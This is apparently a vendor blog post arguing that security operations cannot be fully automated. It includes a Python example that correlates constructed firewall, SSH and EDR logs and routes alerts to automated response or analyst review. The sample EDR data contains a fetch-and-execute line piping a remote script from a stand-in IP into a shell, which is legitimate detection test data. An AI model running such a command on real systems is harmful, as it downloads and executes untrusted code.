We talk a lot about automation in every field, and cybersecurity is no exception. Automation plays an increasingly vital role in security operations, improving efficiency, accuracy and response time across detection, investigation and response. But while automation is often hailed as a cure-all, we at Malizen firmly believe that, like any system, automation has its limits. A 100% automated SOC or CERT that no longer needs humans? We don't really believe in that. We advocate a trusted and transparent approach to automation, applied to the right security tasks. This article explains why.
Empowering cybersecurity through automation
Cybersecurity automation involves the use of technology, algorithms, and predefined workflows to automate repetitive tasks, streamline processes, and enable faster detection, analysis, and response to security incidents.
But can you reach 100% automation in cybersecurity? It is the dream of many. A security system that can be set up and left to run on its own is certainly appealing: it promises to do away with staffing shortages, security policy management and breaches. One may wonder why this is not already the case. After all, a plethora of cybersecurity products claim to be automated from detection to remediation. Yet we still need analysts to staff security teams. Perhaps because machines cannot swiftly, comprehensively and accurately observe, interpret and respond to the countless complexities of human decisions, whether in the physical or digital realm.
While automation has its benefits, it is important to recognise its limits in operational cybersecurity. As Allie Mellen explains in her excellent article "The 'Autonomous SOC' Is A Pipe Dream", automation, despite its advances, still relies on human involvement even for basic tasks, struggles in complex systems with inconsistent inputs, and hits scope limits as soon as additional steps are introduced; adaptability matters in an ever-changing security environment. And attackers aim to break rules, in particular the very rules on which technologies are built, so a fully automated security team will remain vulnerable to attacks that fall outside what it was built to handle.
At Malizen, having observed many cybersecurity analysts and experts at work, we add a further limit to automation: trust. The level of trust largely determines how far an analyst will rely on automation. Trust becomes crucial when complexity and unexpected scenarios make it impractical to fully understand how the automation works. When the analyst goes back over the system's recommendations to check for errors or omissions, one may well ask where the time saved has gone. Between disuse and misuse of automated aids, individual biases, and the relevance of trust indicators in automated systems, the role of trust in reliance on automation is a broad and fascinating subject. Maybe a topic for our machine learning doctoral student?
How does Malizen position itself on the topic of automation? What concrete solutions do we offer through our platform?
Malizen, where automation empowers humans
We have already given you a glimpse of our view on automation in cybersecurity in the previous section, but let's spell it out a bit further.
At Malizen, we understand the clear need for automation in cybersecurity, which has become a major challenge for the industry. At the same time, we firmly believe that human involvement is indispensable and that complete automation of every task is neither necessary nor achievable. Our goal is therefore to put people back in control, helping them discover new threats, understand attacks and resolve incidents. That does not mean people have to do EVERYTHING. That is where automation comes into play in our platform: automate the necessary tasks so that analysts can concentrate on the essential and interesting parts of their work.
How does our visual log investigation platform technically address these objectives?
Enrichment and contextualisation
Events and alerts from many disparate sources are automatically aggregated in our tool, which then enriches the data. Cyber teams get all the context they need to assess and understand the risk instead of chasing numerous false positives.
Effective correlation
Our tool automatically correlates the data, giving better visibility of the attacker's path through the organisation's network, which in turn allows faster response and improved detection playbooks.
Automatic visualisation
Once correlated, the data no longer has to be queried by hand: the platform automatically builds the relevant visualisation for each type of data.
Enhanced decision-making with our co-pilot for better outcomes
Our machine learning-powered co-pilot helps analysts make more relevant decisions quickly. By learning from three different sources (events, context and analyst behaviour), the co-pilot helps junior, senior and apprentice analysts alike decide faster. It recommends avenues of investigation and decisions transparently and automatically, providing an explanation for each recommendation.
By combining automated investigation with informed human decision-making, we can effectively investigate, triage, and comprehend a greater number of real incidents with enhanced accuracy.
After identifying a threat, the logical next step is to initiate a response. SOARs excel at automating the response to known threats. However, the effectiveness of that automation depends on the reliability of the data fed to it by other tools. The earlier stages of the workflow must therefore deliver trustworthy outputs that can be passed on to the response software as they are. The more precise the data going in, the more effective the response tooling.
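To make the enrichment, correlation and response hand-off described above concrete, here is an added, self-contained example. It is illustrative code written for this article, not Malizen's implementation or data model. It takes constructed log lines from three disparate sources (a firewall, an SSH authentication log and an EDR agent), normalises them onto one schema, enriches them from constructed asset, identity and threat-intel tables (in practice these would come from a CMDB, an identity provider and a threat-intel feed, which is an assumption here), correlates them into an attacker path, and then applies a trust gate: a chain is only handed to automated response when the score is high and every enrichment lookup actually resolved. The scoring weights and the `auto_respond`/`analyst_review` decision are hypothetical.

```python
"""Added example (not Malizen's code): normalise, enrich, correlate, then gate
the hand-off to automated response on whether enrichment fully resolved."""
import json
import re
from datetime import datetime, timedelta

# Constructed sample events from three disparate sources (not real traffic).
FIREWALL_JSON = [
    '{"ts": "2024-05-01T10:00:05Z", "src": "203.0.113.7", "dst": "10.0.0.5", "dport": 22, "action": "allow"}',
    '{"ts": "2024-05-01T10:02:40Z", "src": "198.51.100.9", "dst": "10.0.0.77", "dport": 443, "action": "allow"}',
]
AUTH_SYSLOG = [
    "2024-05-01T10:00:09Z srv-db01 sshd[4112]: Accepted password for dbadmin from 203.0.113.7 port 51522 ssh2",
]
EDR_JSON = [
    '{"ts": "2024-05-01T10:01:30Z", "host": "srv-db01", "user": "dbadmin", "cmd": "curl http://203.0.113.7/x.sh | sh"}',
]

# Constructed context stores (assumption: a real deployment would query a CMDB,
# an identity provider and a threat-intel feed for these).
ASSETS = {"10.0.0.5": {"hostname": "srv-db01", "criticality": "high"}}
USERS = {"dbadmin": {"privileged": True}}
THREAT_INTEL = {"203.0.113.7", "198.51.100.9"}

AUTH_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)"
)


def normalise(fw_lines, auth_lines, edr_lines):
    """Map every source onto one schema: ts, source, src_ip, dst_ip, host, user, detail."""
    events = []
    for line in fw_lines:
        d = json.loads(line)
        events.append({"ts": d["ts"], "source": "firewall", "src_ip": d["src"], "dst_ip": d["dst"],
                       "host": None, "user": None, "detail": f"{d['action']} tcp/{d['dport']}"})
    for line in auth_lines:
        m = AUTH_RE.match(line)
        if m:  # lines that do not match the known shape are dropped, never guessed
            events.append({"ts": m["ts"], "source": "auth", "src_ip": m["src"], "dst_ip": None,
                           "host": m["host"], "user": m["user"], "detail": "ssh login accepted"})
    for line in edr_lines:
        d = json.loads(line)
        events.append({"ts": d["ts"], "source": "edr", "src_ip": None, "dst_ip": None,
                       "host": d["host"], "user": d["user"], "detail": d["cmd"]})
    return events


def enrich(events):
    """Attach context. A None value records a lookup that failed, so the gate can see it."""
    for e in events:
        if e["host"] is None and e["dst_ip"] in ASSETS:
            e["host"] = ASSETS[e["dst_ip"]]["hostname"]
        e["criticality"] = next((a["criticality"] for a in ASSETS.values() if a["hostname"] == e["host"]), None)
        e["privileged"] = USERS[e["user"]]["privileged"] if e["user"] in USERS else None
        e["intel_hit"] = e["src_ip"] in THREAT_INTEL
    return events


def _ts(e):
    return datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")


def _entities(e):
    # Pivot keys: source IP and host. Production systems would add session ids.
    return {k for k in (("ip", e["src_ip"]), ("host", e["host"])) if k[1]}


def correlate(events, window=timedelta(minutes=10)):
    """Seed on threat-intel hits and transitively pull in events sharing an entity within the window."""
    chains, covered = [], set()
    for seed in events:
        if not seed["intel_hit"] or id(seed) in covered:
            continue
        chain, ents, grew = [seed], set(_entities(seed)), True
        while grew:
            grew = False
            for e in events:
                if any(e is c for c in chain) or abs(_ts(e) - _ts(seed)) > window:
                    continue
                if ents & _entities(e):
                    chain.append(e); ents |= _entities(e); grew = True
        covered.update(id(e) for e in chain)
        chains.append(sorted(chain, key=_ts))
    return chains


def assess(chain):
    """Score the chain (illustrative weights) and decide who acts on it."""
    score, reasons = 0, []
    for hit, weight, reason in (
        (any(e["intel_hit"] for e in chain), 40, "source IP on threat-intel list"),
        (any(e["source"] == "auth" for e in chain), 20, "successful login from that IP"),
        (any(e["privileged"] for e in chain), 20, "privileged account involved"),
        (any(e["criticality"] == "high" for e in chain), 10, "high-criticality asset"),
        (any(e["source"] == "edr" for e in chain), 10, "post-login command execution"),
    ):
        if hit:
            score += weight; reasons.append(reason)
    unresolved = [e for e in chain if e["host"] is None or (e["user"] and e["privileged"] is None)]
    # Trust gate: only fully enriched, high-scoring chains go to a SOAR playbook;
    # any chain with a failed lookup goes to an analyst, whatever its score.
    decision = "auto_respond" if score >= 80 and not unresolved else "analyst_review"
    return {"score": score, "reasons": reasons, "unresolved": len(unresolved), "decision": decision}


def run(fw=FIREWALL_JSON, auth=AUTH_SYSLOG, edr=EDR_JSON):
    chains = correlate(enrich(normalise(fw, auth, edr)))
    return [{"path": [f"{e['ts']} {e['source']}: {e['detail']}" for e in c], **assess(c)} for c in chains]


if __name__ == "__main__":
    for result in run():
        print(json.dumps(result, indent=2))
```

Run as a script, it prints two chains: the first links the firewall allow, the privileged SSH login and the `curl | sh` execution on srv-db01 into one path and marks it `auto_respond`; the second is a single firewall event to an address the asset inventory does not know, so the host lookup fails and the chain is routed to `analyst_review`. That failed-lookup check is the part that matters for the SOAR hand-off: a response playbook that isolates "the host" cannot act on a chain where the host is unknown, however suspicious the source IP.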
At Malizen, we strongly believe that the success of a human-plus-machine team rests on the trust the human teammate places in their "machine" teammate. Today, the lack of trust in heavily automated systems holds back their adoption. Fully automating a cyber team is therefore a dream. We need to find the right mix of human and machine input to strengthen cyber teams. That is what Malizen is built on and what we believe in.